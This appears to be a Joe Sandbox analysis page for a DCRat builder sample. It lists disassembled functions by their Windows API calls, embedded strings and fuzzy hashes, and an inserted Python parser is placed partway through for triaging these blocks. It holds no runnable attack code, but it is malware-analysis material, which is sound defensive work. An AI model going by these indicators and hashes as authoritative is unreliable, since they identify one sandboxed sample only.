                                      • API String ID: 3937224194-1658105358
                                      • Opcode ID: eb5e91535789401a91a2d60c91731b52ff648ad85c8f039dd6bccce80c36572d
                                      • Instruction ID: 38a03806664a97e1969aa04a4d31e3ae2675d50a3d3e730c5c3ea9b1a17eadd6
                                      • Opcode Fuzzy Hash: eb5e91535789401a91a2d60c91731b52ff648ad85c8f039dd6bccce80c36572d
                                      • Instruction Fuzzy Hash: 5431F332408314EFDB519F60DC48BABBBA8FF09711F004559FE59961A2CBB4D844EFA1
                                      APIs
                                        • Part of subcall function 00F2BF79: _free.LIBCMT ref: 00F2BFA2
                                      • _free.LIBCMT ref: 00F2C003
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F2C00E
                                      • _free.LIBCMT ref: 00F2C019
                                      • _free.LIBCMT ref: 00F2C06D
                                      • _free.LIBCMT ref: 00F2C078
                                      • _free.LIBCMT ref: 00F2C083
                                      • _free.LIBCMT ref: 00F2C08E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction ID: 21eac22b522d3dfa9602996f4056fa4e64c6fe4ea786bc5478b275d29be36b19
                                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction Fuzzy Hash: 0E117231541B24F6D620FBF0DD07FCBB79D6F04700F408854BB9A66452DB68F905BA91
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00F220C1,00F1FB12), ref: 00F220D8
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F220E6
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F220FF
                                      • SetLastError.KERNEL32(00000000,?,00F220C1,00F1FB12), ref: 00F22151
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 187358efe3e8d5dc0ae9892abcbcf6261e6c49d28d7fec1091f39f580ca6e447
                                      • Instruction ID: 756c128ac1dccb9662ae1dadc0a5ae074575ad23344e6710553aa17db26de1d6
                                      • Opcode Fuzzy Hash: 187358efe3e8d5dc0ae9892abcbcf6261e6c49d28d7fec1091f39f580ca6e447
                                      • Instruction Fuzzy Hash: AE0147326197357FF7A46BB47C86B2A3B49EF117743210629F310940F0EF194D11B100
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 0-1718035505
                                      • Opcode ID: d7205adb81f27313d459e1869c53037d3c5279cf55e8fca68ce2c42b6eb57a61
                                      • Instruction ID: 40b832d3342b3ad2ec4216ec6f53afc1cbb6786727e5e9828366ce726b9a18a0
                                      • Opcode Fuzzy Hash: d7205adb81f27313d459e1869c53037d3c5279cf55e8fca68ce2c42b6eb57a61
                                      • Instruction Fuzzy Hash: 3B01C8B1B417225BCF249FB4AC956E733F8AA817763305A3AE501D7240EE91C8C1F6E0
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10D0D
                                        • Part of subcall function 00F0ACF5: GetVersionExW.KERNEL32(?), ref: 00F0AD1A
                                      • LocalFileTimeToFileTime.KERNEL32(?,00F10CB8), ref: 00F10D31
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F10D47
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F10D56
                                      • SystemTimeToFileTime.KERNEL32(?,00F10CB8), ref: 00F10D64
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10D72
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 2afac5584afa86d944746eea1c697c46974b5fa319ca149bb31a748f8bc9d573
                                      • Instruction ID: a73a46d8b081cf342a924ac815c3782a17a57ee6c2efda1f73757310d167dab5
                                      • Opcode Fuzzy Hash: 2afac5584afa86d944746eea1c697c46974b5fa319ca149bb31a748f8bc9d573
                                      • Instruction Fuzzy Hash: C031D87A90020DEBCB04DFE4D8859EFBBB9FF58710B04455AE955E3210EB309685DB64
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 9b407cef15b3399a2796ce8bfb981a7663acf98dd1ab351f9e1f2a1c781f5902
                                      • Instruction ID: 8672f45bc3b6d4767fd07a7846fcd1a90fe001713e48d1c07a3bb0c0a716f4c8
                                      • Opcode Fuzzy Hash: 9b407cef15b3399a2796ce8bfb981a7663acf98dd1ab351f9e1f2a1c781f5902
                                      • Instruction Fuzzy Hash: FA218B7160810EBBD7099E14DC51FBB77ADDB90764F148524FC0997201E2B4EDC576D1
                                      APIs
                                      • GetLastError.KERNEL32(?,00F40EE8,00F23E14,00F40EE8,?,?,00F23713,00000050,?,00F40EE8,00000200), ref: 00F28FA9
                                      • _free.LIBCMT ref: 00F28FDC
                                      • _free.LIBCMT ref: 00F29004
                                      • SetLastError.KERNEL32(00000000,?,00F40EE8,00000200), ref: 00F29011
                                      • SetLastError.KERNEL32(00000000,?,00F40EE8,00000200), ref: 00F2901D
                                      • _abort.LIBCMT ref: 00F29023
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 25375fe78037e46225bec284756341809a57ac51a55d72029e544a51f7a0129d
                                      • Instruction ID: 402bf85b41f09473fbe32be16690949aac07d0f63c4029ccec660d08145c8a51
                                      • Opcode Fuzzy Hash: 25375fe78037e46225bec284756341809a57ac51a55d72029e544a51f7a0129d
                                      • Instruction Fuzzy Hash: 8AF0F47290AA356BC212B3787D0AB2B3A5A9FD07B0F250014F515E3292EF28C9037011
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1D2F2
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1D30C
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1D31D
                                      • TranslateMessage.USER32(?), ref: 00F1D327
                                      • DispatchMessageW.USER32(?), ref: 00F1D331
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1D33C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: 795bc0230b71d384f17d8335408972229702970a09204e5871b447acdc4a5afb
                                      • Instruction ID: f1848aca45a9fc13bd6f24ecd9427b3760ee6c75a1880df28dca23235f9aa985
                                      • Opcode Fuzzy Hash: 795bc0230b71d384f17d8335408972229702970a09204e5871b447acdc4a5afb
                                      • Instruction Fuzzy Hash: 64F03C72E0151DBBCB219BA1DC4CEDBBF7EEF523A1F008012F616D2050D6758581D7A1
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 00F1C435
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CompareString_wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2548945186-3358265660
                                      • Opcode ID: 218f1d114cc31cabcc1b894995bd9f14cb5e0670b1a7227c76cb962be973124f
                                      • Instruction ID: c10a6d120945c4e2f9fa574334862f5ac3da1104e56ebad5e82348358c3a648d
                                      • Opcode Fuzzy Hash: 218f1d114cc31cabcc1b894995bd9f14cb5e0670b1a7227c76cb962be973124f
                                      • Instruction Fuzzy Hash: F7318172D44209AADB21DA94DC51FEB77BCEF54720F0041A6FA05D6090EBB8DEC4EA90
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 00F1ADFD
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1AE22
                                      • DeleteObject.GDI32(00000000), ref: 00F1AE54
                                      • DeleteObject.GDI32(00000000), ref: 00F1AE77
                                        • Part of subcall function 00F19E1C: FindResourceW.KERNEL32(00F1AE4D,PNG,?,?,?,00F1AE4D,00000066), ref: 00F19E2E
                                        • Part of subcall function 00F19E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E46
                                        • Part of subcall function 00F19E1C: LoadResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E59
                                        • Part of subcall function 00F19E1C: LockResource.KERNEL32(00000000,?,?,?,00F1AE4D,00000066), ref: 00F19E64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                      • String ID: ]
                                      • API String ID: 142272564-3352871620
                                      • Opcode ID: 82c0a198f1789f29b7c305d075f9f39418356d27c7aa2307ef0a9224e03af1b8
                                      • Instruction ID: 25641462c192ac941d3ac6ee8aff821cca39527a246c0bb97cf3d497704850d4
                                      • Opcode Fuzzy Hash: 82c0a198f1789f29b7c305d075f9f39418356d27c7aa2307ef0a9224e03af1b8
                                      • Instruction Fuzzy Hash: 5A016636941619B7C7102765AC15AFF7B79AF81B21F080014FD00A7291CFB58C65B7F2
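The per-function blocks above follow one fixed layout (an "APIs" list, then "Memory Dump Source", "Joe Sandbox IDA Plugin" and "Similarity"), which makes them easy to turn into structured records for pivoting on an API name, an embedded string or a fuzzy hash. The parser below is an added example by the editor, not code from Joe Sandbox or from this report; the two sample blocks it embeds are copied from this page and trimmed, the "Download File" suffix it strips is the link label the page fuses onto dump names, and the indicator table (reading RarHtmlClassName and RENAMEDLG as WinRAR self-extractor artefacts) is the editor's own triage note rather than something the sandbox emits.

```python
"""Added example: parse Joe Sandbox per-function summaries (the "APIs" /
"Memory Dump Source" / "Joe Sandbox IDA Plugin" / "Similarity" blocks shown
on this report page) into records that can be pivoted on during triage."""
import re
from typing import Dict, List, Tuple

# Constructed sample: two blocks copied from this report, trimmed for length.
SAMPLE = """\
APIs
• GetTempPathW.KERNEL32(00000800,?), ref: 00F1C54A
• _swprintf.LIBCMT ref: 00F1C57E
  • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
• SetDlgItemTextW.USER32(?,00000066,00F4946A), ref: 00F1C59E
• EndDialog.USER32(?,00000001), ref: 00F1C6B2
Strings
Memory Dump Source
• Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
Similarity
• API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
• String ID: %s%s%u
• API String ID: 2892007947-1360425832
• Instruction Fuzzy Hash: 0B41C371D4061CAADB26DBA0CC45EDA77BDEF09711F0040A6E909E60A0E7799BC4EF90
APIs
• ShowWindow.USER32(?,00000000), ref: 00F1964E
• SetWindowTextW.USER32(?,00000000), ref: 00F19732
Strings
Memory Dump Source
• Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Instruction Fuzzy Hash: 5431F332408314EFDB519F60DC48BABBBA8FF09711F004559FE59961A2CBB4D844EFA1
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "WriteFile.KERNEL32(?,?,00000000), ref: 00F2EF4A" or "_swprintf.LIBCMT ref: 00F1C57E",
# optionally prefixed with "Part of subcall function <addr>: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")


def parse_report(text: str) -> List[Dict]:
    """Return one record per function block: direct APIs, subcall APIs,
    '$'-separated strings, dump file names and the Similarity fields."""
    records: List[Dict] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            # A block starts with "APIs" (or "Strings" when it has no APIs);
            # either header seen after a finished Similarity section opens a new record.
            if line in ("APIs", "Strings") and (rec is None or section == "Similarity"):
                rec = {"apis": [], "subcalls": [], "strings": [], "dumps": []}
                records.append(rec)
            section = line
            continue
        if not line.startswith("•") or rec is None:
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if not m:
                continue
            call = {"name": m["name"], "module": m["module"], "ref": m["ref"],
                    "args": m["args"].split(",") if m["args"] else []}
            (rec["subcalls"] if m["parent"] else rec["apis"]).append(call)
        elif section == "Memory Dump Source":
            key, _, val = body.partition(": ")
            if key in ("Source File", "Associated"):
                # Drop ", Offset: ..." and the "Download File" link label fused onto the name.
                rec["dumps"].append(val.split(",")[0].replace("Download File", "").strip())
        elif section in ("Joe Sandbox IDA Plugin", "Similarity"):
            key, _, val = body.partition(":")
            val = val.strip()
            if key == "String ID":
                rec["strings"] = [s for s in val.split("$") if s]
            else:
                rec[key.lower().replace(" ", "_")] = val
    return records


# Editor's triage notes for strings seen in this report (assumption: not emitted
# by the sandbox). RarHtmlClassName / RENAMEDLG are WinRAR SFX window-class and
# dialog names; "%s%s%u" next to GetTempPathW builds a temp-directory file name.
INDICATORS = {
    "RarHtmlClassName": "WinRAR SFX HTML window class",
    "RENAMEDLG": "WinRAR SFX rename dialog",
    "%s%s%u": "temp-path file name format (GetTempPathW + _swprintf)",
}


def flag_indicators(records: List[Dict]) -> List[Tuple[str, str, str]]:
    """(fuzzy-hash prefix, string, note) for every record string in INDICATORS."""
    return [(rec.get("instruction_fuzzy_hash", "")[:16], s, INDICATORS[s])
            for rec in records for s in rec["strings"] if s in INDICATORS]


def functions_calling(records: List[Dict], api_name: str) -> List[str]:
    """Ref addresses of direct (non-subcall) calls to api_name across all blocks."""
    return [c["ref"] for rec in records for c in rec["apis"] if c["name"] == api_name]


if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for rec in recs:
        print(rec["api_id"], rec["strings"], [c["name"] for c in rec["apis"]])
    print(flag_indicators(recs))
    print("EndDialog refs:", functions_calling(recs, "EndDialog"))
```

Run it against the full page text saved to a file (replace SAMPLE with the file contents) to list every block that touches a given API, or to collect the Instruction Fuzzy Hash values for comparison against other samples' reports; the "Part of subcall function" lines are kept separate from direct calls so that a pivot on, say, WriteFile does not also match every caller of a helper that writes.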
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1CCDB
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F1CCF1
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1CD05
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00F1CD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 5a9ea724dd532beca4bf0e47987e270bb5d0bd14dafa6840730f075f447f21c8
                                      • Instruction ID: c7b49a82fe019f32488f185e33e0c3c5e1d15070501513a5e561961c098a9d92
                                      • Opcode Fuzzy Hash: 5a9ea724dd532beca4bf0e47987e270bb5d0bd14dafa6840730f075f447f21c8
                                      • Instruction Fuzzy Hash: 2701F5337C43157AD1114B64AC09FAB7B9CAB5AB52F100410F346A20E0C6A2A944F7E6
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F27573,00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002), ref: 00F275E2
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F275F5
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00F27573,00000000,?,00F27513,00000000,00F3BAD8,0000000C,00F2766A,00000000,00000002), ref: 00F27618
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 57f69f17b0c85738a2bd566b3403a1d688e625e146310fff44285f7bdee440f2
                                      • Instruction ID: 7bc9379dc5f8b6b3edfb13f18245bc5079b7151f3f43e599859661d04b3af94b
                                      • Opcode Fuzzy Hash: 57f69f17b0c85738a2bd566b3403a1d688e625e146310fff44285f7bdee440f2
                                      • Instruction Fuzzy Hash: C0F0AF30A1861CBBCB15ABA4DC09B9EBFBAEF04735F000068F805A6150DB709A80EA90
                                      APIs
                                        • Part of subcall function 00F10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                        • Part of subcall function 00F10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F0EB92
                                      • GetProcAddress.KERNEL32(00F481C0,CryptUnprotectMemory), ref: 00F0EBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: 5d341394b37e54c3be0d152c05e610d0f0c97c2b6db2031fe0368800714f6b8c
                                      • Instruction ID: 7695b16decaf0ef96704ac99e73644291021e627c7813c0433b4c8dad0988212
                                      • Opcode Fuzzy Hash: 5d341394b37e54c3be0d152c05e610d0f0c97c2b6db2031fe0368800714f6b8c
                                      • Instruction Fuzzy Hash: 0BE046B0A01741EECB20DF389808B42FAE66B18725F04885EE4D6E3280DAF5D580BB61
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
